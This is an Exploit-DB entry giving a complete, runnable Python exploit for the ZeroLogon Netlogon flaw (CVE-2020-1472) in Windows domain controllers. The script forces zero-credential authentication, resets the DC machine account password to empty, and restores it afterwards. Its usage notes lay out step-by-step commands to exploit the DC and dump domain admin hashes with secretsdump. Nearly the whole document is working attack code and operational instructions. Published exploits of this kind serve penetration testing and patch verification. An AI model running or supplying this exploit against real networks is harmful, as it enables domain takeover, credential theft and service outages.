ZeroLogon - Netlogon Elevation of Privilege

EDB-ID:

49071




Platform:

Windows

Date:

2020-11-18


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

# Exploit Title: ZeroLogon - Netlogon Elevation of Privilege
# Date: 2020-10-04
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.microsoft.com
# Version: Microsoft Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2
# Tested on: Microsoft Windows Server 2016 Standard x64
# CVE : CVE-2020-1472
# Credit to: Tom Tervoort for discovery and Dirk-Janm for Impacket code
# Sources: https://www.secura.com/pathtoimg.php?id=2055
# Requirements: python3 and impacket 0.9.21+ (tested using this version)
#!/usr/bin/env python3
import hmac, hashlib, struct, sys, socket, time, argparse, logging, codecs
from binascii import hexlify, unhexlify
from subprocess import check_call
from impacket.dcerpc.v5.dtypes import NULL, MAXIMUM_ALLOWED
from impacket.dcerpc.v5 import nrpc, epm, transport
from impacket import crypto, version
from impacket.examples import logger
from Cryptodome.Cipher import AES
from struct import pack, unpack
from impacket.dcerpc.v5.rpcrt import DCERPCException


class Exploit:
    def __init__(
            self,
            name='',
            address='',
            attempts=2000,
            password=''
    ):
        name = name.rstrip('$')
        self.secureChannelType = nrpc.NETLOGON_SECURE_CHANNEL_TYPE\
            .ServerSecureChannel
        self.authenticator = self.getAuthenticator(stamp=0)
        self.clearNewPasswordBlob = b'\x00' * 516
        self.primaryName = ('\\\\%s' % name) + '\x00'
        self.accountName = ('%s$' % name) + '\x00'
        self.computerName = name + '\x00'
        self.clientCredential = b'\x00' * 8
        self.clientChallenge = b'\x00' * 8
        self.negotiateFlags = 0x212fffff
        self.address = address
        self.max = attempts
        self.dce = None
        self.sessionKey = None
        self.clientStoredCredential = None
        self.password = password

    def encodePassword(self, password):
        if isinstance(password, str):
            password = password.encode('utf-8')
        return b'\x00' * (512 - len(password))\
               + password \
               + pack('<L', len(password))

    def getAuthenticator(self, creds=b'\x00' * 8, stamp=10):
        authenticator = nrpc.NETLOGON_AUTHENTICATOR()
        authenticator['Credential'] = creds
        authenticator['Timestamp'] = stamp
        return authenticator

    def serverReqChallenge(self):
        try:
            binding = epm.hept_map(
              self.address, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp'
            )
            self.dce = transport.DCERPCTransportFactory(binding).get_dce_rpc()
            self.dce.connect()
            self.dce.bind(nrpc.MSRPC_UUID_NRPC)
            return nrpc.hNetrServerReqChallenge(
                self.dce,
                self.primaryName,
                self.computerName,
                self.clientChallenge
            )
        except BaseException as ex:
            self.logError(ex)

    def serverAuthenticate(self):
        try:
            auth = nrpc.hNetrServerAuthenticate3(
                self.dce,
                self.primaryName,
                self.accountName,
                self.secureChannelType,
                self.computerName,
                self.clientCredential,
                self.negotiateFlags
            )
            assert auth['ErrorCode'] == 0
            self.logInfo('successfully authenticated')
            return True
        except nrpc.DCERPCSessionError as ex:
            self.dce = None
            if ex.get_error_code() == 0xc0000022:
                return None
            else:
                self.logFail(ex.get_error_code())
        except BaseException as ex:
            self.dce = None
            self.logFail(ex)
        self.dce = None

    def serverPasswordSet(self):
        try:
            return nrpc.hNetrServerPasswordSet2(
                self.dce,
                self.primaryName,
                self.accountName,
                self.secureChannelType,
                self.computerName,
                self.authenticator,
                self.clearNewPasswordBlob
            )
        except BaseException as ex:
            self.logError(ex)

    def authenticate(self):
        self.logInfo(
            'checking target, attempting to authenticate %d max
attempts' % self.max
        )
        for attempt in range(0, self.max):
            self.logInfo('attempt %d' % attempt)
            self.serverReqChallenge()
            self.serverAuthenticate()
            if self.dce is not None:
                break
        if self.dce:
            return True
        else:
            self.logError('failed to authenticate')

    def exploit(self):
        self.logInfo('attempting password reset')
        reset = self.serverPasswordSet()
        if reset['ErrorCode'] == 0:
            self.logInfo('successfully reset password')
        else:
            self.logError('failed to reset password')
        return self

    def ComputeNetlogonCredentialAES(self, challenge):
        return nrpc.ComputeNetlogonCredentialAES(
            challenge,
            self.sessionKey
        )

    def logInfo(self, message):
        sys.stdout.write("[+] %s\n" % str(message))
        return self

    def logError(self, message):
        sys.stderr.write("[-] error %s\n" % str(message))

    def logFail(self, message):
        sys.stderr.write("[!] failure %s\n" % str(message))
        sys.exit(2)

    def restore(self):
        self.logInfo('attempting to restore password')
        self.clientChallenge = b'12345678'
        try:
            self.primaryName = NULL
            challenge = self.serverReqChallenge()
            self.sessionKey = nrpc.ComputeSessionKeyAES(
                '', self.clientChallenge, challenge['ServerChallenge']
            )
            self.clientCredential = self.ComputeNetlogonCredentialAES(
                self.clientChallenge
            )
            try:
                self.serverAuthenticate()
            except Exception as e:
                if str(e).find('STATUS_DOWNGRADE_DETECTED') < 0:
                    raise
            self.logInfo('restoring password')
            self.clientStoredCredential = pack('<Q', unpack('<Q',
self.clientCredential)[0] + 10)
            self.authenticator = self.getAuthenticator(

creds=self.ComputeNetlogonCredentialAES(self.clientStoredCredential)
            )
            self.clearNewPasswordBlob = self.ComputeNetlogonCredentialAES(
                self.encodePassword(self.password)
            )
            reset = self.serverPasswordSet()
            if reset['ErrorCode'] == 0:
                self.logInfo('successfully restored password')
            else:
                self.logError('failed to restore password')
        except Exception as ex:
            self.logError(ex)
        return self


if __name__ == '__main__':
    info = """
NOTE - Exploitation will break the DC until restored, recommended guidelines:

    1. Check the DC - usually ~300 attempts, use the NETBIOS name not the FQDN:
        cve-2020-1472.py -do check -target <NETBIOS NAME> -ip <IP>

    2. Exploit the DC - this will break the DC until restored:
        cve-2020-1472.py -do exploit <NETBIOS NAME> -ip <IP>

    3. Dump the DC - for the DA hashes, this will not contain the
machine hex-pass:
        secretsdump.py -just-dc -no-pass <NETBIOS NAME>\$@<IP>

    4. Dump the DC again - use the DA hash to get the machines hex-pass:
        secretsdump.py -no-pass -hashes <LMHASH>:<NTHASH> <DOMAIN>/<ADMIN>@<IP>

    5. Restore target - this fixes the DC:
        cve-2020-1472.py -do restore -target <NETBIOS NAME> -ip <IP>
-hex <HEXPASS>
"""
    parser = argparse.ArgumentParser(
        description='CVE-2020-1472 ZeroLogon Exploit - Netlogon
Elevation of Privilege',
        add_help=True
    )
    try:
        parser.add_argument('-do', default='check', action='store',
                            help='What to do (default check):
[check|restore|exploit]')
        parser.add_argument('-target', action='store',
                            help='NETBIOS name of target DC (not the FQDN)')
        parser.add_argument('-ip', action='store',
                            help='IP address of target DC')
        parser.add_argument('-password', default='', action='store',
                            help='The plaintext password to use to
reset the DC')
        parser.add_argument('-hex', default='', action='store',
                            help='The hex password to use to restore
the DC (recommended)')
        parser.add_argument('-max', default=2000, action='store',
                            help='Max attempts to authenticate with
the DC (usually ~300 or less)')

        if len(sys.argv) < 3:
            parser.print_help()
            print(info)
            sys.exit(1)
        options = parser.parse_args()

        if options.do.lower() == 'check':
            Exploit(
                name=options.target,
                address=options.ip,
                attempts=int(options.max)
            ).authenticate()
        elif options.do.lower() == 'exploit':
            exp = Exploit(
                name=options.target,
                address=options.ip,
                attempts=int(options.max)
            )
            if exp.authenticate():
                exp.exploit()
        elif options.do.lower() == 'restore':
            if options.hex != '' and options.password == '':
                options.password = unhexlify(options.hex)
            if options.password != '':
                exp = Exploit(
                    name=options.target,
                    address=options.ip,
                    password=options.password
                ).restore()
        else:
            parser.print_help()

    except Exception as error:
        sys.stderr.write('[-] error in main %s\n' % str(error))